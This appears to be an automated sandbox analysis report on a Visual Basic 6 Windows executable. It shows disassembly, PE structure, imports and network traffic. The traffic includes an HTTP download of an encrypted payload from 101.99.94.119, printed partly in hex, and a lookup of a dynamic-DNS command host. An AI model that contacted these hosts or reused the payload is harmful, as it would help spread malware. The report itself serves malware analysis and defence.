add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push esp
pop ecx
add byte ptr [eax], al
sub al, 58h
add byte ptr [eax], al
add byte ptr [ecx], dl
add byte ptr [ebx+4Bh], dl
push edx
dec ebp
dec ecx
dec esi
inc esp
inc esp
inc ebp
dec esp
dec ecx
dec esi
inc edi
inc ebp
push edx
dec esi
inc ebp
add byte ptr [00000001h], cl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b64	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5b92	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13de4	0x14000	False	0.648803710938	data	7.05513425915	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5b92	0x6000	False	0.545776367188	data	6.0293757353	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bcea	0xea8	data
RT_ICON	0x1b442	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 532795385, next used block 536862194
RT_ICON	0x1aeda	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x18932	0x25a8	data
RT_ICON	0x1788a	0x10a8	data
RT_ICON	0x17422	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173c8	0x5a	data
RT_VERSION	0x171e0	0x1e8	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	CLUBWOMAN
FileVersion	1.00
OriginalFilename	CLUBWOMAN.exe
ProductName	REFOUNDING

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 09:52:02.509993076 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.554785967 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.554905891 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.599960089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.600111008 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.647567034 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.647619009 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.647640944 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.647659063 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.647680044 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.647818089 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.694133997 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694166899 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694184065 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694204092 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694253922 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694274902 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694294930 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694318056 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.694372892 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.694441080 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.743522882 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743558884 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743583918 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743613005 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743634939 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743655920 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743676901 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743699074 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743721008 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743742943 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743767977 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743789911 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743813038 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743833065 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743854046 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.743875980 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.745096922 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.790580988 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790736914 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790760040 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790779114 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790800095 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790815115 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790817976 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.790831089 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790852070 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790873051 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790884018 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.790891886 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790911913 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790936947 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790947914 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.790960073 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790982008 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.790997028 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791003942 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791019917 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791030884 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791043997 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791065931 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791078091 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791088104 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791102886 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791110992 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.791138887 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.791165113 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.839260101 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839301109 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839318037 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839340925 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839361906 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839384079 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839407921 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839432001 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839456081 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839478970 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839503050 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839524031 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839545965 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839570045 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839596033 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839618921 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839639902 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839663982 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839685917 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839709044 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839730978 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839752913 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839778900 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839802980 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839827061 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839850903 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839874029 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839896917 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.839917898 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.841974020 CEST	80	49732	101.99.94.119	192.168.2.3
Aug 3, 2021 09:52:02.842142105 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.842166901 CEST	49732	80	192.168.2.3	101.99.94.119
Aug 3, 2021 09:52:02.842551947 CEST	80	49732	101.99.94.119	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 09:50:02.068259001 CEST	49199	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:02.100552082 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:02.103404999 CEST	53	49199	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:02.135581970 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:03.751369953 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:03.779362917 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:04.804028034 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:04.829040051 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:05.845832109 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:05.873245955 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:07.138077021 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:07.162651062 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:08.450983047 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:08.484448910 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:09.460745096 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:09.493299961 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:10.580183983 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:10.605452061 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:11.391868114 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:11.425403118 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:12.533147097 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:12.558248997 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:13.693217039 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:13.721752882 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:16.217385054 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:16.243992090 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:16.909429073 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:16.936829090 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:17.741444111 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:17.772319078 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:18.457809925 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:18.485790014 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:19.433485031 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:19.462393999 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:32.419984102 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:32.456270933 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:37.631396055 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:37.673178911 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:53.027306080 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:53.056313038 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:54.184706926 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:54.212661028 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:54.829355955 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:54.865000963 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:06.332206964 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:06.374577045 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:08.099805117 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:08.132152081 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:19.998214006 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:20.048595905 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:26.368093014 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:26.406167984 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:54.770961046 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:54.819643021 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:58.437495947 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:58.479460001 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:03.800883055 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:03.835515976 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:55.178214073 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:55.246586084 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:55.928847075 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:55.966856003 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:56.515408993 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:56.555078983 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:56.991461039 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:57.026705980 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:57.575887918 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:57.608617067 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:58.152482986 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:58.190172911 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:58.831623077 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:58.865165949 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:59.994276047 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:53:00.027309895 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 3, 2021 09:53:00.936120987 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:53:00.971250057 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 3, 2021 09:53:01.997314930 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:53:02.031568050 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 3, 2021 09:54:54.472569942 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:54:54.508253098 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 3, 2021 09:54:54.953653097 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:54:54.986418009 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 3, 2021 09:54:59.222904921 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:54:59.255475998 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 3, 2021 09:55:03.005989075 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:55:03.039793015 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 3, 2021 09:55:03.251657009 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:55:03.295259953 CEST	53	55708	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:24.651887894 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:24.652589083 CEST	57145	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:24.687371016 CEST	53	56803	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:24.688313007 CEST	53	57145	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:25.117799997 CEST	55359	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:25.151722908 CEST	53	55359	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:25.615422964 CEST	58306	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:25.683232069 CEST	53	58306	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:58.535772085 CEST	64124	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:58.584244967 CEST	53	64124	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 09:52:03.800883055 CEST	192.168.2.3	8.8.8.8	0xdf97	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 09:52:03.835515976 CEST	8.8.8.8	192.168.2.3	0xdf97	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 09:54:54.508253098 CEST	8.8.8.8	192.168.2.3	0xf46a	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 09:57:25.151722908 CEST	8.8.8.8	192.168.2.3	0xd836	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49732	101.99.94.119	80	C:\Users\user\Desktop\Fec9qUX4at.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 09:52:02.600111008 CEST	7678	OUT	GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 3, 2021 09:52:02.647567034 CEST	7679	IN	HTTP/1.1 200 OK Date: Mon, 02 Aug 2021 23:52:02 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Mon, 02 Aug 2021 21:02:57 GMT ETag: "72840-5c899e4c3da73" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 31 79 a2 69 b5 67 ac a3 66 68 89 94 04 1b b4 8f c9 36 a1 00 58 5a db 92 66 6d cc 77 0a bf 4e 76 be cb df 4e 9d df 64 5e 44 ed 21 f3 cf f9 7d 62 b4 1b 44 fc 1e d1 54 51 7a 33 c1 4c df e6 15 ab fc 9f 41 d1 41 8f 51 31 14 c8 d8 11 ba 23 86 c1 35 93 9d fc 44 9e 32 ca a0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 21 67 d6 a5 5b 6f 63 6f 44 5d 92 7d a4 66 fa 44 00 3d 71 d6 5c 03 88 d7 97 a0 3d f6 3d 55 3c 74 0e f3 18 b3 74 b0 8f 9b fc 7f 70 16 c6 64 54 6e 65 de 18 f0 d3 5c bc 13 45 22 ac 24 20 7e 82 b9 70 76 a4 7d 01 f7 d5 61 be 6f 06 f4 2c 87 a6 b3 20 b2 ad 40 2e d1 2f 53 60 03 72 48 d8 a8 33 13 0a f2 ff d2 dd 78 63 a0 8b 27 17 28 0e 60 82 f6 72 ae 94 e0 7b d9 7f 8e c3 dd 64 b8 7a 3f 9c de 07 ce e8 0f a5 e2 f6 89 60 01 25 fd 8a 32 fc 79 07 a7 ab df eb 97 4a 2c 9a 34 91 22 ae 83 f5 10 09 71 2b 83 86 cf 6e c1 fd 78 9b ff 23 b1 96 1b 1e b1 63 5b 3d 90 ef 89 7e 8a 22 4d e5 54 77 c8 44 5a ca a4 4c 7d b5 c0 fc c0 dd 2e 18 32 28 dd ca 3a 96 9c 05 f0 1c 01 92 09 ad 55 8b 34 03 76 7c 2a c7 57 01 af c3 92 f4 fe a1 46 ae cb 12 c4 67 bb f2 9c 4b c8 90 cb 0b 36 3d a2 cf d6 65 cd 91 6d 1a 7b b3 ae 5d b5 71 0a 24 46 d2 95 ab 70 f8 9c 0c 0f 55 c2 c0 0c ed 95 d2 b5 e3 48 48 bc f0 3e 3a 82 e8 91 28 22 11 91 fd 50 31 d0 48 57 96 73 6f 6f ab 25 0c 11 ac 70 08 53 83 83 3f b8 3e c5 49 ba 0a e0 6c cd 20 3a db 77 67 8e fb 36 1e cb 1f 01 03 9a 71 8e 49 ed 61 2c 69 21 ad ce f9 ee ff ec 84 8e 6d 86 db b8 3f b7 03 e2 7f 24 ba 8c 67 c8 40 b0 eb df 8a b4 91 9b 4f 28 1a 3b 00 71 28 06 b7 a3 84 fa b2 23 5c 4c 76 b9 6d c0 ea b6 ba 5f 07 9a 82 96 5b b9 53 9d 33 fd 1b e9 51 5d 11 32 aa ab 37 a4 e9 e4 ed 8f 5f a9 dd 16 e8 f1 02 6d 5d 93 67 0b b1 97 41 ba 80 65 d4 cc ba 7e b1 6e be 4b 0a b7 2c 68 50 ad 15 84 32 c1 47 3e 78 a2 f0 ac 5e f6 53 15 d2 d0 93 e0 68 65 1c ab 21 69 d6 3b e3 69 9c 2b 10 57 7b 25 d8 99 a9 23 1e 80 6a 8b d0 4c c9 98 5f 04 ad 20 6e 20 e0 d4 86 3d d5 78 c0 63 00 93 0d 76 4f fd ab d5 50 53 0c fd ae b8 f8 84 03 9c dc 98 09 3d 1f 8f 80 de 9c d3 a6 97 0b fa 1a 66 11 63 4d 31 1f 06 d7 7e 4c ea b2 0d 17 00 0e 9f e1 20 97 00 06 32 b2 d4 a3 8a ef 7a 40 7f dd 0c 11 b7 be c1 20 e1 bb 88 08 d8 e9 42 02 00 36 78 93 28 da 41 52 f9 96 9e c3 54 a2 68 b6 e1 93 f8 b8 d3 15 6d 42 73 42 64 ce 30 64 40 c6 a3 ef ed a2 d8 77 ce b3 d0 4e 87 51 cd 57 42 a7 9e 1f fa 7c 71 00 a0 0e f5 10 6a ff 84 ee f7 d2 d0 7f 20 ec 19 ab 75 73 9c 02 41 31 3d 88 d3 19 ed 16 29 30 07 c6 5c c1 5b bd a4 4b 02 bc c6 24 24 f2 cb 2e 0a a2 1f a2 53 16 ba b6 66 85 70 87 87 55 7d 12 44 66 c1 b9 46 4e 1e a0 dc 7a e0 ca 8e 6e f8 1e 4b 3f 65 f2 b4 35 8e 12 2c b3 7e 16 04 83 d2 5c fc e9 9c 64 d2 98 66 e9 42 4b 0b ac c1 11 2d 8f b1 c5 d1 d1 42 8f 51 31 10 c8 d8 11 45 dc 86 c1 8d 93 9d fc 44 9e 32 ca e0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 31 66 d6 a5 55 70 d9 61 44 e9 9b b0 85 de fb 08 cd 1c 25 be 35 70 a8 a7 e5 cf 5a 84 5c 38 1c 17 6f 9d 76 dc 00 90 ed fe dc 0d 05 78 e6 0d 3a 4e 21 91 4b d0 be 33 d8 76 6b 2f a1 2e 04 7e 82 b9 70 76 a4 7d ab 74 97 51 50 8d 2a 97 c2 65 8a Data Ascii: 1yigfh6XZfmwNvNd^D!}bDTQz3LAAQ1#5D2s7EIc?;Vs_q!g[ocoD]}fD=q\==U<ttpdTne\E"$ ~pv}ao, @./S`rH3xc'(`r{dz?`%2yJ,4"q+nx#c[=~"MTwDZL}.2(:U4v\|WFgK6=em{]q$FpUHH>:("P1HWsoo%pS?>Il :wg6qIa,i!m?$g@O(;q(#\Lvm_[S3Q]27_m]gAe~nK,hP2G>x^She!i;i+W{%#jL_ n =xcvOPS=fcM1~L 2z@ B6x(ARThmBsBd0d@wNQWB\|qj usA1=)0\[K$$.SfpU}DfFNznK?e5,~\dfBK-BQ1ED2s7EIc?;Vs_q1fUpaD%5pZ\8ovx:N!K3vk/.~pv}tQPe

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Fec9qUX4at.exe PID: 1304 Parent PID: 5516

General

Start time:	09:50:05
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\Fec9qUX4at.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Fec9qUX4at.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	2046B941817392E3815535FCCB1F39DC
